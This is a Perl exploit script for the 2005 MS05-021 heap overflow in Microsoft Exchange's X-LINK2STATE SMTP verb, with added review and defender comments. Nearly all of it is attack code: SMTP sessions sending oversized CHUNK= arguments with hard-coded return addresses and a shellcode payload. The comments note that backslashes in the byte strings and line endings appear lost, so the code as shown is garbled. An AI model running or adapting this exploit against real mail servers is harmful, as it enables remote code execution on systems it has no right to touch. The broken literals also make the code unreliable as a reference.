# Title : MS Exchange Server Remote Code Execution Exploit (MS05-021)
# Published : 2005-04-19
# Author : Evgeny Pinchuk
#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
#
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
#
# Thanks and greets:
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
#
#
# Proof-of-concept for the MS05-021 Exchange X-LINK2STATE heap overflow
# described in the header. Flow: open an SMTP session (port 25), send EHLO,
# then send oversized X-LINK2STATE CHUNK= arguments; the second chunk
# carries the payload, and a fresh session sends one more chunk.
#
# NOTE(review): the byte-string literals below read "x55xB2..." rather than
# escape sequences, so the backslashes appear to have been lost when the
# page was rendered; the literals as shown are not the bytes the inline
# comments describe. Likewise "rn" / "n" in the SMTP lines and messages.
#
# Defender notes: the vendor fix is the MS05-021 update named in the header.
# On the wire this looks like an SMTP client issuing the Exchange-specific
# X-LINK2STATE verb with a ~1000-byte CHUNK= argument immediately after
# EHLO, which ordinary mail clients never do; exposing port 25 of an
# Exchange server to untrusted networks is what makes this reachable.
#
# NOTE(review): no `use strict`/`use warnings`, and the return values of
# send()/recv() are never checked, so a dropped connection is silent.
use IO::Socket::INET;
my $host = shift(@ARGV);        # target host: first command-line argument, unvalidated
my $port = 25;                  # SMTP
my $reply;                      # last server response (up to 1024 bytes)
my $request;                    # next line to send
my $EAX="x55xB2xD3x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll)
my $ECX="xF0xA1x5Cx7C"; # lpTopLevelExceptionFilter
# Both addresses above are hard-coded for the "Tested on" platform in the
# header (Windows 2000 Server SP4 EN / Exchange 2000 SP3); they are not
# portable across builds or language versions.
my $JMP="xEBx10";            # EB 10: short relative jump forward over the two addresses
# Payload. The ASCII runs embedded in the hex below decode to "user32.dll",
# "MessageBoxA" and "MS05-021 Test", which suggests the payload only pops a
# message box on the server; the loader stub itself is not documented here.
my $SC="x31xc0x31xdbx31xc9x31xd2xebx37x59x88x51x0axbbxD5x01" .
"x59x7Cx51xffxd3xebx39x59x31xd2x88x51x0bx51x50xbbx5F" .
"x0Cx59x7Cxffxd3xebx39x59x31xd2x88x51x0Dx31xd2x52x51" .
"x51x52xffxd0x31xd2x50xb8x72x69x59x7Cxffxd0xe8xc4xff" .
"xffxffx75x73x65x72x33x32x2ex64x6cx6cx4exe8xc2xffxff" .
"xffx4dx65x73x73x61x67x65x42x6fx78x41x4exe8xc2xffxff" .
"xffx4Dx53x30x35x2Dx30x32x31x20x54x65x73x74x4e";
my $cmd="X-LINK2STATE CHUNK=";  # the vulnerable verb; every malicious line starts with it
# --- First session ---
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";
recv($socket, $reply, 1024, 0);         # SMTP banner
print "Response:" . $reply;
$request = "EHLOrn";
send $socket, $request, 0;
print "[+] Sent EHLOn";
recv($socket, $reply, 1024, 0);         # EHLO reply (extension list)
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "rn";      # 1st chunk: 1000 filler bytes, no payload
send $socket, $request, 0;
print "[+] Sent 1st chunkn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
# 2nd chunk layout: 30 filler bytes, short jump, the two fixed addresses,
# 100 filler bytes, payload, then padded with "C" to exactly 1000 bytes so
# it is the same length as the 1st chunk.
$request = "A"x30 . $JMP . $EAX . $ECX . "B"x100 . $SC;
my $left=1000-length($request);
$request = $request . "C"x$left;
$request = $cmd . $request . "rn";
send $socket, $request, 0;
print "[+] Sent 2nd chunkn";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
close $socket;
# --- Second session ---
# Reconnect and send one more 1000-byte chunk; presumably this is what
# makes the service act on the state corrupted by the first session --
# the page does not say, so treat this as an inference.
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";
recv($socket, $reply, 1024, 0);         # SMTP banner
print "Response:" . $reply;
$request = "EHLOrn";
send $socket, $request, 0;
print "[+] Sent EHLOn";
recv($socket, $reply, 1024, 0);         # EHLO reply
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "rn";      # 3rd chunk: filler only, same size as the 1st
send $socket, $request, 0;
print "[+] Sent 3rd chunkn";
close $socket;                          # no reply is read for the 3rd chunk